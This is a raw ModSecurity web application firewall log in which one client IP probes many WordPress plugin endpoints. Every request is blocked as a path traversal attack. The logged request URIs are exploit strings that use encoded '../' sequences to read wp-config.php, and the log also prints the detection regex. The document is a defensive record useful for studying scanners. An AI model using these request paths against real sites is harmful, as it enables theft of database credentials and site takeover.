/wp-content/plugins/dukapress/lib/dp_image.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dukapress/lib/dp_image.php"] [unique_id "YtscYXhurfgLch3PImzH8gAAAM8"] [Fri Jul 22 16:53:37.760498 2022] [:error] [pid 22470:tid 140017083057920] [client 72.11.157.116:51392] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "YtscYXxqqtgWgIAXsGFhaAAAAAc"] [Fri Jul 22 16:53:37.850202 2022] [:error] [pid 22470:tid 140017091450624] [client 72.11.157.116:51394] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php/"] [unique_id "YtscYXxqqtgWgIAXsGFhaQAAAAY"] [Fri Jul 22 16:53:37.940272 2022] [:error] [pid 22470:tid 140017024308992] [client 72.11.157.116:51396] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "YtscYXxqqtgWgIAXsGFhagAAAA4"] [Fri Jul 22 16:53:38.040227 2022] [:error] [pid 22470:tid 140017007523584] [client 72.11.157.116:51398] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "YtscYnxqqtgWgIAXsGFhawAAABA"] [Fri Jul 22 16:53:38.302607 2022] [:error] [pid 22470:tid 140017141806848] [client 72.11.157.116:51400] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"] [unique_id "YtscYnxqqtgWgIAXsGFhbAAAAAA"] [Fri Jul 22 16:53:38.406257 2022] [:error] [pid 22470:tid 140017125021440] [client 72.11.157.116:51402] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "YtscYnxqqtgWgIAXsGFhbQAAAAI"] [Fri Jul 22 16:53:38.498296 2022] [:error] [pid 22472:tid 140017041094400] [client 72.11.157.116:51404] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "YtscYipbG8_UBGXeM63wsgAAAIw"] [Fri Jul 22 16:53:38.589439 2022] [:error] [pid 23081:tid 140017049487104] [client 72.11.157.116:51406] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ibs-mappro/lib/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ibs-mappro/lib/download.php"] [unique_id "YtscYnhurfgLch3PImzH8wAAAMs"] [Fri Jul 22 16:53:38.691693 2022] [:error] [pid 22471:tid 140017083057920] [client 72.11.157.116:51408] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/image-export/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/image-export/download.php"] [unique_id "YtscYuCtYZwatdwcM8WqyAAAAEc"] [Fri Jul 22 16:53:38.784946 2022] [:error] [pid 22471:tid 140017049487104] [client 72.11.157.116:51410] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "YtscYuCtYZwatdwcM8WqyQAAAEs"] [Fri Jul 22 16:53:38.875050 2022] [:error] [pid 22471:tid 140017032701696] [client 72.11.157.116:51412] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jquery-mega-menu/skin.php"] [unique_id "YtscYuCtYZwatdwcM8WqygAAAE0"] [Fri Jul 22 16:53:38.965005 2022] [:error] [pid 22471:tid 140017041094400] [client 72.11.157.116:51414] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/justified-image-grid/download.php"] [unique_id "YtscYuCtYZwatdwcM8WqywAAAEw"] [Fri Jul 22 16:53:39.054627 2022] [:error] [pid 22472:tid 140017125021440] [client 72.11.157.116:51416] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/livesig/livesig-ajax-backend.php"] [unique_id "YtscYypbG8_UBGXeM63wswAAAII"] [Fri Jul 22 16:53:39.145169 2022] [:error] [pid 22472:tid 140017091450624] [client 72.11.157.116:51418] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "YtscYypbG8_UBGXeM63wtAAAAIY"] [Fri Jul 22 16:53:39.237846 2022] [:error] [pid 22472:tid 140017108236032] [client 72.11.157.116:51420] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-photo-gallery/macdownload.php"] [unique_id "YtscYypbG8_UBGXeM63wtQAAAIQ"] [Fri Jul 22 16:53:39.334979 2022] [:error] [pid 22472:tid 140017015916288] [client 72.11.157.116:51422] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "YtscYypbG8_UBGXeM63wtgAAAI8"] [Fri Jul 22 16:53:39.455838 2022] [:error] [pid 23081:tid 140017125021440] [client 72.11.157.116:51424] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mailz/lists/config/config.php"] [unique_id "YtscY3hurfgLch3PImzH9AAAAMI"] [Fri Jul 22 16:53:39.550090 2022] [:error] [pid 23081:tid 140017083057920] [client 72.11.157.116:51426] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "YtscY3hurfgLch3PImzH9QAAAMc"] [Fri Jul 22 16:53:39.639424 2022] [:error] [pid 23081:tid 140017032701696] [client 72.11.157.116:51428] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "YtscY3hurfgLch3PImzH9gAAAM0"] [Fri Jul 22 16:53:39.729305 2022] [:error] [pid 23081:tid 140016940381952] [client 72.11.157.116:51430] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/myflash/myflash-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/myflash/myflash-button.php"] [unique_id "YtscY3hurfgLch3PImzH9wAAANg"] [Fri Jul 22 16:53:39.819143 2022] [:error] [pid 22470:tid 140017108236032] [client 72.11.157.116:51432] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php"] [unique_id "YtscY3xqqtgWgIAXsGFhbgAAAAQ"] [Fri Jul 22 16:53:39.930251 2022] [:error] [pid 22470:tid 140017099843328] [client 72.11.157.116:51434] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] 